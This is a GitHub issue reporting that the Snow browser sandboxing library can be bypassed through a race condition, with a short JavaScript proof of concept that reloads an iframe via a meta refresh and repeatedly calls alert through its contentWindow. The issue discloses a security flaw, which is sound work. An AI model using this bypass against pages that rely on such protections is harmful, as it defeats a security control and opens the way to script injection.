Skip to content

Snow can by bypassed with race condition #142

Open
@terjanq

Description

@terjanq

Could be the same underlying issue from: #141

var x = document.createElement('iframe');
x.srcdoc = `<meta http-equiv="refresh" content="0;">`
document.body.appendChild(x);
setInterval(()=>{
    x.contentWindow.alert(origin);
},0);

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions